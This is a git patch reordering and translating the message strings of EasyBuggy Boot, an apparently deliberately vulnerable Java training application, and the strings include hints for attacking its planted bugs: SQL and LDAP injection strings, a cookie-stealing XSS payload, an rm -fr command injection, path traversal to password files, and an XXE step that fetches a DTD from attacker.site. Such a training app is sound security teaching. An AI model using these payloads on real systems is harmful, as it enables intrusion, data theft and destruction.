\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. -msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. -msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. -msg.note.sqlijc=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 -msg.note.ldap.injection=You can login with admin and password. \nYou can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.ldap.injection=You can login with admin and password. You can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. +msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. -msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. -msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.netsocketleak=Network socket leak occurs every time you load this page. -msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. +msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. +msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. +msg.note.roundofferror=Round off error occurs if you enter 1. +msg.note.session.fixation=You can login with admin and password. The URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 +msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.threadleak=Thread leak occurs every time you load this page. +msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. +msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. -msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. +msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd msg.note.xxe.step2=and upload the following XML file, you can display the password file (/etc/passwd) on the Linux server. -msg.not.image.file=The chosen file is not an image file. -msg.not.match.regular.expression=The input string does not match the regular expression. -msg.not.xml.file=The chosen file is not an XML file. -msg.mail.changed=Your mail address is successfully changed. -msg.mail.change.failed=Mail address change failed. -msg.mail.format.is.invalid=The mail address is an invalid format. -msg.mail.is.empty=Please enter subject and content. -msg.match.regular.expression=The input string matches the regular expression. -msg.max.file.size.exceed=The file size exceeds the allowable limit. -msg.passwd.changed=Your password is successfully changed. msg.passwd.change.failed=Password change failed. +msg.passwd.changed=Your password is successfully changed. msg.passwd.is.too.short=The password must be at least 8 characters. msg.password.not.match=The password does not match. -msg.permgen.space.leak.occur=Memory leak occurs in {0} every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.permgen.space.leak.occur=Memory leak occurs in {0} every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. msg.question.reach.the.moon=How many times would you have to fold a piece of paper (thickness 0.1mm) for it to be thick enough to reach the moon (384,400 km)? msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. +msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. msg.smtp.server.not.setup=Mail properties are not correctly set in application.properties. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. -msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.update.users=You can update users information. -msg.select.upload.file=Select a file to upload. -msg.note.threadleak=Thread leak occurs every time you load this page. -msg.user.not.exist=The user does not exist. +msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.user.already.exist=The user already exists. +msg.user.not.exist=The user does not exist. msg.valid.json=Valid JSON\! msg.warn.enter.name.and.passwd=Please enter your name and password. -title.clickjacking.page=Change Your Mail -title.csrf.page=Change Your Password -title.clientinfo.page=Client Information -title.design.test.page=Design Test -title.serverinfo.page=Server Information -style.name.bootstrap=Bootstrap + +section.errors=Errors +section.exceptions=Unchecked Exception +section.performance.issue=Performance Issue +section.troubles=Troubles +section.vulnerabilities=Vulnerabilities + +style.description.basic=Basic header and footer are used. style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ -style.name.google.mdl=Google Material Design Lite style.description.google.mdl=For more detail, please refer to the page\: https\://getmdl.io/ -style.name.materialize=Materialize style.description.materialize=For more detail, please refer to the page\: http\://materializecss.com/ -style.name.nonstyle=Non-Style +style.description.monochro=Monochrome header and footer are used. +style.description.noframe=No header and footer are used. style.description.nonstyle=No stylesheet is specified. style.name.basic=Basic -style.description.basic=Basic header and footer are used. +style.name.bootstrap=Bootstrap +style.name.google.mdl=Google Material Design Lite +style.name.materialize=Materialize style.name.monochro=Monochrome -style.description.monochro=Monochrome header and footer are used. style.name.noframe=No Frame -style.description.noframe=No header and footer are used. -title.filedescriptorleak.page=Access History +style.name.nonstyle=Non-Style + title.adminmain.page=Main Page for Administrators +title.clickjacking.page=Change Your Mail +title.clientinfo.page=Client Information +title.codeinjection.page=Parse JSON +title.commandinjection.page=Performing Basic Numeric Operations +title.createobjects.page=Sum of natural numbers +title.csrf.page=Change Your Password title.current.date=Display Current Date -title.threadleak.page=Display Current Thread Count title.current.time=Display Current Time +title.dbconnectionleak.page=User List title.deadlock.page=Detect Deadlock +title.design.test.page=Design Test title.endlesswaiting.page=Execute Batch -title.nullbyteinjection.page=Download Guides -title.index.page=EasyBuggy Boot +title.filedescriptorleak.page=Access History +title.index.page=EasyBuggy Bootlin title.intoverflow.page=The Distance from Earth to the Moon title.login.page=Login Page for Administrators title.lossoftrailingdigits.page=Decimal Addition title.mailheaderinjection.page=Question to Administrator title.memoryleak.page=Heap Memory Usage title.memoryleak2.page=Non-Heap Memory Usage +title.memoryleak3.page=Display Time Zone Information +title.memoryleak3.page.list=Lists of Time Zones title.mojibake.page=Capitalize String -title.commandinjection.page=Performing Basic Numeric Operations -title.codeinjection.page=Parse JSON title.netsocketleak.page=Measure Response Time -title.strplusopr.page=Random String Generator +title.nullbyteinjection.page=Download Guides title.roundofferror.page=Easy Subtraction +title.serverinfo.page=Server Information title.slowregex.page=Test Regular Expression title.sqlijc.page=Search Your Secret Number -title.createobjects.page=Sum of natural numbers -title.memoryleak3.page=Display Time Zone Information -title.memoryleak3.page.list=Lists of Time Zones +title.strplusopr.page=Random String Generator +title.threadleak.page=Display Current Thread Count title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File -title.dbconnectionleak.page=User List -title.xss.page=Reverse String title.xee.page=Batch Registration of Users +title.xss.page=Reverse String title.xxe.page=Batch Update of Users From a43688f3de7d7a1e1027106e5887b5b5429d22d7 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 24 Oct 2017 21:52:31 +0900 Subject: [PATCH 030/139] New translations messages.properties (French) --- src/main/resources/messages_fr.properties | 355 ++++++++++------------ 1 file changed, 165 insertions(+), 190 deletions(-) diff --git a/src/main/resources/messages_fr.properties b/src/main/resources/messages_fr.properties index d02e954..5b6babb 100644 --- a/src/main/resources/messages_fr.properties +++ b/src/main/resources/messages_fr.properties @@ -1,148 +1,122 @@ #X-Generator: crowdin.com -description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.\nThe result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. - -section.troubles=Troubles +description.access.history=Access history in this page (The latest 15 records). +description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.The result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String +description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. +description.design.test=Please click on one of the links below. +description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. +description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: +description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. +description.performance.issue=Issues for performance +description.random.string.generator=If you enter a character count, then a random characters of the count is created. +description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. +description.reverse.string=If you enter a string, then the reversed string is shown. +description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: +description.send.mail=You can send a mail to the site administrator. +description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. description.troubles=Memory leak, infinite loop, deadlock, and so on\: +description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: -function.name.memory.leak=Memory Leak (Java heap space) -function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. -function.name.memory.leak2=Memory Leak ({0}) -function.description.memory.leak2=Memory leak occurs in {0} every time you load this page. -function.name.memory.leak3=Memory Leak (C heap space) -function.description.memory.leak3=Memory leak occurs in C heap space every time you load this page. -function.name.infinite.loop=Infinite Loop -function.description.infinite.loop=Infinite loop occurs if you click this link. -function.name.dead.lock=Deadlock (Java) +function.description.brute.force=This login page is vulnerable for brute-force attack because it does not have an account lock mechanism. +function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. +function.description.code.injection=There is a code injection vulnerability in this page. +function.description.csrf=There is a CSRF vulnerability in the change password page. +function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. -function.name.dead.lock2=Deadlock (SQL) function.description.dead.lock2=Deadlock (SQL) can occur. -function.name.endless.waiting.process=Endless Waiting Process +function.description.ei.error=ExceptionInInitializerError is thrown at first, and NoClassDefFoundError is thrown from the second if you click this link. function.description.endless.waiting.process=Endless waiting process can occur. -function.name.jvm.crash.eav=JVM Crash -function.description.jvm.crash.eav=JVM crashes if you click this link. -function.name.redirect.loop=Redirect Loop -function.description.redirect.loop=Redirect loop occurs if you click this link. -function.name.forward.loop=Forward Loop -function.description.forward.loop=Forward loop occurs if you click this link. -function.name.network.socket.leak=Network Socket Leak -function.description.network.socket.leak=Network socket leak occurs every time you load this page. -function.name.database.connection.leak=Database Connection Leak -function.description.database.connection.leak=Database connection leak occurs every time you load the page. -function.name.file.descriptor.leak=File Descriptor Leak function.description.file.descriptor.leak=File descriptor leak occurs every time you load this page. -function.name.thread.leak=Thread Leak -function.description.thread.leak=Thread leak occurs every time you load this page. -function.name.mojibake=Mojibake -function.description.mojibake=Mojibake can occur. -function.name.int.overflow=Integer Overflow +function.description.forward.loop=Forward loop occurs if you click this link. +function.description.infinite.loop=Infinite loop occurs if you click this link. function.description.int.overflow=Integer overflow can occur. -function.name.round.off.error=Round Off Error -function.description.round.off.error=Round off error can occur. -function.name.truncation.error=Truncation Error -function.description.truncation.error=Truncation error can occur. -function.name.cancellation.of.significant.digits=Cancellation of Significant Digits -function.description.cancellation.of.significant.digits=Cancellation of significant digits can occur. -function.name.loss.of.trailing.digits=Loss of Trailing Digits +function.description.jvm.crash.eav=JVM crashes if you click this link. +function.description.ldap.injection=There is an LDAP injection vulnerability in this page. function.description.loss.of.trailing.digits=Loss of trailing digits can occur. - - -section.performance.issue=Performance Issue -description.performance.issue=Issues for performance - -function.name.slow.regular.expression=Delay due to regular expression parse +function.description.mail.header.injection=There is a mail header injection vulnerability in this page. +function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. +function.description.memory.leak2=Memory leak occurs in {0} every time you load this page. +function.description.memory.leak3=Memory leak occurs in C heap space every time you load this page. +function.description.mojibake=Mojibake can occur. +function.description.network.socket.leak=Network socket leak occurs every time you load this page. +function.description.null.byte.injection=There is a null byte injection vulnerability in this page. +function.description.open.redirect=There is an open redirect vulnerability in this login page. +function.description.os.command.injection=There is an OS command injection vulnerability in this page. +function.description.path.traversal=There is a path traversal vulnerability in this page. +function.description.redirect.loop=Redirect loop occurs if you click this link. +function.description.round.off.error=Round off error can occur. +function.description.session.fixation=This login page is vulnerable for session fixation attack. function.description.slow.regular.expression=It takes time to parse the regular expression if you enter a specific string. -function.name.slow.string.plus.operation=Delay of creating string due to +(plus) operator function.description.slow.string.plus.operation=It takes time to append strings if you enter a large number. -function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation function.description.slow.unnecessary.object.creation=If you input a large number, it takes time to respond due to unnecessary object creation. -function.name.stop.the.world=Stop the World -function.description.stop.the.world=Stop the World occurs if you click this link. - - -section.vulnerabilities=Vulnerabilities -description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: - -function.name.xss=XSS (Cross Site Scripting) -function.description.xss=There is a cross site scripting vulnerability in this page. -function.name.sql.injection=SQL Injection function.description.sql.injection=There is an SQL injection vulnerability in this page. -function.name.ldap.injection=LDAP Injection -function.description.ldap.injection=There is an LDAP injection vulnerability in this page. +function.description.thread.leak=Thread leak occurs every time you load this page. +function.description.throwable={0} is thrown if you click this link. +function.description.truncation.error=Truncation error can occur. +function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. +function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. +function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. +function.description.xee=There is an XEE vulnerability in this page. +function.description.xss=There is a cross site scripting vulnerability in this page. +function.description.xxe=There is an XXE vulnerability in this page. +function.name.brute.force=Login page that allows brute-force attacks +function.name.clickjacking=Clickjacking function.name.code.injection=Code Injection -function.description.code.injection=There is a code injection vulnerability in this page. -function.name.os.command.injection=OS Command Injection -function.description.os.command.injection=There is an OS command injection vulnerability in this page. +function.name.csrf=CSRF (Cross-site Request Forgery) +function.name.dangerous.file.inclusion=Dangerous File Inclusion +function.name.database.connection.leak=Database Connection Leak +function.name.dead.lock=Deadlock (Java) +function.name.dead.lock2=Deadlock (SQL) +function.name.endless.waiting.process=Endless Waiting Process +function.name.file.descriptor.leak=File Descriptor Leak +function.name.forward.loop=Forward Loop +function.name.infinite.loop=Infinite Loop +function.name.int.overflow=Integer Overflow +function.name.jvm.crash.eav=JVM Crash +function.name.ldap.injection=LDAP Injection +function.name.loss.of.trailing.digits=Loss of Trailing Digits function.name.mail.header.injection=Mail Header Injection -function.description.mail.header.injection=There is a mail header injection vulnerability in this page. +function.name.memory.leak=Memory Leak (Java heap space) +function.name.memory.leak2=Memory Leak ({0}) +function.name.memory.leak3=Memory Leak (C heap space) +function.name.mojibake=Mojibake +function.name.network.socket.leak=Network Socket Leak function.name.null.byte.injection=Null Byte Injection -function.description.null.byte.injection=There is a null byte injection vulnerability in this page. -function.name.unrestricted.size.upload=Size Unrestricted File Upload -function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. -function.name.unrestricted.ext.upload=Extension Unrestricted File Upload -function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.name.open.redirect=Login page that allows Open Redirect -function.description.open.redirect=There is an open redirect vulnerability in this login page. -function.name.brute.force=Login page that allows brute-force attacks -function.description.brute.force=This login page is vulnerable for brute-force attack because it does not have an account lock mechanism. -function.name.session.fixation=Login page that allows session fixation attacks -function.description.session.fixation=This login page is vulnerable for session fixation attack. -function.name.verbose.error.message=Verbose Authentication Error Messages -function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. -function.name.dangerous.file.inclusion=Dangerous File Inclusion -function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.name.os.command.injection=OS Command Injection function.name.path.traversal=Path Traversal -function.description.path.traversal=There is a path traversal vulnerability in this page. +function.name.redirect.loop=Redirect Loop +function.name.round.off.error=Round Off Error +function.name.session.fixation=Login page that allows session fixation attacks +function.name.slow.regular.expression=Delay due to regular expression parse +function.name.slow.string.plus.operation=Delay of creating string due to +(plus) operator +function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation +function.name.sql.injection=SQL Injection +function.name.thread.leak=Thread Leak +function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure -function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. -function.name.csrf=CSRF (Cross-site Request Forgery) -function.description.csrf=There is a CSRF vulnerability in the change password page. -function.name.clickjacking=Clickjacking -function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. +function.name.unrestricted.ext.upload=Extension Unrestricted File Upload +function.name.unrestricted.size.upload=Size Unrestricted File Upload +function.name.verbose.error.message=Verbose Authentication Error Messages function.name.xee=XEE (XML Entity Expansion) -function.description.xee=There is an XEE vulnerability in this page. +function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) -function.description.xxe=There is an XXE vulnerability in this page. - - -section.errors=Errors -description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: - -function.description.ei.error=ExceptionInInitializerError is thrown at first, and NoClassDefFoundError is thrown from the second if you click this link. - - -section.exceptions=Unchecked Exception -description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: -function.description.throwable={0} is thrown if you click this link. - - - -description.access.history=Access history in this page (The latest 15 records). -description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String -description.design.page=You can change design of this page. Please click one of the links below and change \nthis page to your style. -description.design.test=Please click on one of the links below. -description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. -description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. -description.random.string.generator=If you enter a character count, then a random characters of the count is created. -description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. -description.reverse.string=If you enter a string, then the reversed string is shown. -description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. -description.send.mail=You can send a mail to the site administrator. label.access.time=Access Time -label.available.characters=Available Characters label.attach.file=Attach File +label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate label.capitalized.string=Capitalized String label.character.count=Character Count label.code=Code label.content=Content -label.current.date=Current Date label.current.thread.count=Current Thread Count -label.current.time=Current Time label.execution.result=Execution Result\: -label.goto.admin.page=Go to admin main page label.go.to.main=Go to main page +label.goto.admin.page=Go to admin main page label.history.back=Back label.ip.address=IP Address label.json.string=JSON String @@ -153,22 +127,22 @@ label.login.user.id=Login User ID label.logout=Log out label.lowercase.characters=Lowercase Characters label.mail=Mail Address -label.memory.init=Init Value -label.memory.used=Used Init Value +label.memory.collection.usage=Collection Usage label.memory.committed=Committed Init Value +label.memory.init=Init Value label.memory.max=Max Init Value -label.memory.usage=Memory Usage label.memory.peak.usage=Peak Memory Usage -label.memory.collection.usage=Collection Usage +label.memory.usage=Memory Usage +label.memory.used=Used Init Value label.metaspace=Metaspace -label.permgen.space=PermGen space -label.platform=Platform label.name=Name label.numbers=Numbers label.obelus=/ label.password=Password +label.permgen.space=PermGen space label.phone=Phone label.ping.url=Ping URL +label.platform=Platform label.response.code=Response Code label.response.time=Response Time label.reversed.string=Reversed String @@ -179,14 +153,9 @@ label.string=String label.subject=Subject label.submit=Submit label.times=times -label.timezone.dst.savings=Amount of DST -label.timezone.has.same.rules=Same Rule as Default label.timezone.id=Time Zome ID -label.timezone.in.daylight.time=Being in DST label.timezone.name=Time Zome Name label.timezone.offset=Time Zome Offset -label.timezone.raw.offset=Amount of Raw Offset Time -label.timezone.use.daylight.time=Useing DST label.update=Update label.upload=Upload label.uppercase.characters=Uppercase Characters @@ -194,8 +163,9 @@ label.user.agent=User Agent label.user.id=User ID label.value=Value label.version=Version -label.your.name=Your Name label.your.mail=Your Mail Address +label.your.name=Your Name + msg.account.locked=Your account is locked out because the number of login failures exceeds 10 times. msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! @@ -205,7 +175,6 @@ msg.batch.registration.complete=Batch registration of users has completed. msg.batch.registration.fail=Batch registration of users fails. msg.batch.update.complete=Batch update of users has completed. msg.batch.update.fail=Batch update of users fails. -msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.calc.sym.natural.numbers=This page can calculate the sum of all natural numbers (1 + 2 + 3 + ... + n) less than or equal to n. msg.cant.create.batch=Can't create a batch file. msg.convert.grayscale=You can convert the color of an image file into gray scale. @@ -216,140 +185,146 @@ msg.dead.lock.detected=Deadlock is detected. msg.dead.lock.not.occur=Deadlock has not occurred yet. msg.deadlock.occurs=A lock could not be obtained due to a deadlock. msg.download.file=You can download the following PDF files. +msg.enter.decimal.value=Please enter the absolute value of a decimal number less than 1. msg.enter.json.string=Please enter JSON string. msg.enter.mail=Please enter your mail address. msg.enter.math.expression=Please enter a mathematical expression. You can use java.lang.Math in the expression. For example, Math.sqrt(Math.pow(2, 6)) - 5 -msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. msg.enter.name=Please enter your name. +msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. msg.enter.passwd=If you enter a new password and click the submit button, then your password will be changed. msg.enter.positive.number=Please enter a positive number. -msg.enter.decimal.value=Please enter the absolute value of a decimal number less than 1. -msg.enter.id.and.password=Please enter your user ID and password. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: -msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. -msg.info.jvm.not.crash=JVM crash only occurs if using Oracle JDK 6 or 7. msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} -msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. -msg.need.admin.privilege=You need admin privileges to go ahead from here. -msg.note.brute.force=You can login with admin and password. \nThe number of login attempts is not limited on this page, so the brute force attack is possible. +msg.mail.change.failed=Mail address change failed. +msg.mail.changed=Your mail address is successfully changed. +msg.mail.format.is.invalid=The mail address is an invalid format. +msg.mail.is.empty=Please enter subject and content. +msg.match.regular.expression=The input string matches the regular expression. +msg.max.file.size.exceed=The file size exceeds the allowable limit. +msg.not.image.file=The chosen file is not an image file. +msg.not.match.regular.expression=The input string does not match the regular expression. +msg.not.xml.file=The chosen file is not an XML file. +msg.note.brute.force=You can login with admin and password. The number of login attempts is not limited on this page, so the brute force attack is possible. msg.note.clickjacking=This page receives a request that a user does not intend and changes the user's mail address. +msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. If you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. +msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. +msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. msg.note.deadlock=Deadlock occurs after continuously loading this page few times. +msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you sort in the descending order and click the "update" button on the other, then deadlock occurs in database. msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. -msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. -msg.note.roundofferror=Round off error occurs if you enter 1. -msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. -msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. -msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. -msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. -msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. +msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. -msg.note.session.fixation=You can login with admin and password. \nThe URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. -msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. -msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. -msg.note.sqlijc=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 -msg.note.ldap.injection=You can login with admin and password. \nYou can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.ldap.injection=You can login with admin and password. You can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. +msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. -msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. -msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.netsocketleak=Network socket leak occurs every time you load this page. -msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. +msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. +msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. +msg.note.roundofferror=Round off error occurs if you enter 1. +msg.note.session.fixation=You can login with admin and password. The URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
